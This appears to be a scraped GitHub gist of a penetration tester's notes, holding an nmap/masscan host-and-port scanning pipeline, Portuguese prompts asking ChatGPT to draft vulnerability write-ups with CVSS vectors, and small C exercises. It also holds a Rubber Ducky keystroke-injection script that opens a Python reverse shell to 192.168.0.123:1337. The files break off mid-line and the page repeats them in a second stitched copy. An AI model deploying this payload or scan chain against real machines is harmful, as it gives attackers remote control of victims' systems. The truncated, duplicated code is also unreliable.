Kali Nathalie kalinathalie

## super-kali-nathalie-notes.md

      
              1 file
            
          
              1 fork
            
          
                0 comments
              
            
              1 star
            
          
                kalinathalie
                / super-kali-nathalie-notes.md
            
            
              Last active
              March 16, 2026 19:43
            
              
                My gift for the universe
              
          
    Kali Nathalie Notes


Table of Contents


Setup
Active Directory Assessment

Quick Checklist ✅
Ping Castle (Windows Host)


Responder


## scan-and-fuzzing-notes.txt
Scan{
	nmap -sn -T2 -PR -iL ranges.txt | awk '/Nmap scan report for/ { if ($6 ~ /^\(/) gsub("[()]", "", $6); else $6=$NF; print $6 }' > hosts.txt
	masscan -p1-65535 --rate=2000 -e eth0 -iL hosts.txt -oG masscan.gnmap
	cat masscan.gnmap | grep "Ports:" | awk '{ip=$4; for(i=4;i<=NF;i++) if ($i ~ /open/) { split($i, a, "/"); ports[ip]=ports[ip]","a[1] }} END { for (ip in ports) { print ip, ports[ip] }}' > targets.txt
	sed 's/ ,/ /g' targets.txt > clean_targets.txt
	rm targets.txt && mkdir output
	while read line; do ip=$(echo $line | cut -d' ' -f1); ports=$(echo $line | cut -d' ' -f2 | sed 's/^,//'); nmap -v -Pn -sV -sC -p $ports $ip -oN output/nmap_$ip.txt; done < clean_targets.txt
}

Fuzzing{

## note.txt
ChatGPT queries{
	Gere, tudo em inglês, primeiramente o nome de uma vulnerabilidade para "exposição de endereço de IP interno", e logo após isso, um texto pequeno e simples sobre essa vulnerabilidade, depois outro texto pequeno sobre a mitigação dessa vulnerabilidade e também gostaria do Cálculo CVSS seguindo o padrão "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N". E também dois links de referência atualizados e funcionais sobre essa vulnerabilidade.

	Gere, tudo em inglês, Um texto pequeno e simples sobre a vulnerabilidade de "Printers With Default Credentials", vulnerabilidade no qual é possível acessar impressoras com credenciais padrão, depois outro texto pequeno sobre a mitigação, este somente com "bulletpoints" de maneira bem direta e pontual dessa vulnerabilidade. Gostaria também de um pequeno texto e pontual sobre o impacto dessa vulnerabilidade, e também gostaria do Cálculo CVSS dessa vulnerabilidade seguindo esse exemplo: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N". E também dois links de referên

## txt
REM Author: K4L1 (K4L1 on Discord)
REM Description: Reverse shell in Linux
REM Version:	1.0
REM Category:	ReverseShell
DELAY 1000
ESC
DELAY 100
ALT F2
DELAY 1000
STRING python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.123",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

## safadao.c
#include <stdio.h>
#include <math.h>
void wesley_safadao(){
int dia, mes, ano, safadeza, anjo, somatorio=0, i;

scanf("%d %d %d", &dia, &mes, &ano);
for(i=1;i<=mes;i++){
somatorio+=i;
}
safadeza = somatorio+(ano/100)*(50-dia);

## Fizzbuzz.c
#include <stdio.h>

int main() {
    int N, i;
    scanf("%d", &N);
    for(i=1;i<N;i++){
        if(i%3==0 && i%5!=0)printf("Fizz\n");
        else if(i%5==0 && i%3!=0)printf("Buzz\n");
        else if(i%15==0)printf("FizzBuzz\n");
        else printf("%d\n", i);
	Scan{
	nmap -sn -T2 -PR -iL ranges.txt \| awk '/Nmap scan report for/ { if ($6 ~ /^\(/) gsub("[()]", "", $6); else $6=$NF; print $6 }' > hosts.txt
	masscan -p1-65535 --rate=2000 -e eth0 -iL hosts.txt -oG masscan.gnmap
	cat masscan.gnmap \| grep "Ports:" \| awk '{ip=$4; for(i=4;i<=NF;i++) if ($i ~ /open/) { split($i, a, "/"); ports[ip]=ports[ip]","a[1] }} END { for (ip in ports) { print ip, ports[ip] }}' > targets.txt
	sed 's/ ,/ /g' targets.txt > clean_targets.txt
	rm targets.txt && mkdir output
	while read line; do ip=$(echo $line \| cut -d' ' -f1); ports=$(echo $line \| cut -d' ' -f2 \| sed 's/^,//'); nmap -v -Pn -sV -sC -p $ports $ip -oN output/nmap_$ip.txt; done < clean_targets.txt
	}

	Fuzzing{
	ChatGPT queries{
	Gere, tudo em inglês, primeiramente o nome de uma vulnerabilidade para "exposição de endereço de IP interno", e logo após isso, um texto pequeno e simples sobre essa vulnerabilidade, depois outro texto pequeno sobre a mitigação dessa vulnerabilidade e também gostaria do Cálculo CVSS seguindo o padrão "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N". E também dois links de referência atualizados e funcionais sobre essa vulnerabilidade.

	Gere, tudo em inglês, Um texto pequeno e simples sobre a vulnerabilidade de "Printers With Default Credentials", vulnerabilidade no qual é possível acessar impressoras com credenciais padrão, depois outro texto pequeno sobre a mitigação, este somente com "bulletpoints" de maneira bem direta e pontual dessa vulnerabilidade. Gostaria também de um pequeno texto e pontual sobre o impacto dessa vulnerabilidade, e também gostaria do Cálculo CVSS dessa vulnerabilidade seguindo esse exemplo: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N". E também dois links de referên
	REM Author: K4L1 (K4L1 on Discord)
	REM Description: Reverse shell in Linux
	REM Version: 1.0
	REM Category: ReverseShell
	DELAY 1000
	ESC
	DELAY 100
	ALT F2
	DELAY 1000
	STRING python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.123",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
	#include <stdio.h>
	#include <math.h>
	void wesley_safadao(){
	int dia, mes, ano, safadeza, anjo, somatorio=0, i;

	scanf("%d %d %d", &dia, &mes, &ano);
	for(i=1;i<=mes;i++){
	somatorio+=i;
	}
	safadeza = somatorio+(ano/100)*(50-dia);
	#include <stdio.h>

	int main() {
	int N, i;
	scanf("%d", &N);
	for(i=1;i<N;i++){
	if(i%3==0 && i%5!=0)printf("Fizz\n");
	else if(i%5==0 && i%3!=0)printf("Buzz\n");
	else if(i%15==0)printf("FizzBuzz\n");
	else printf("%d\n", i);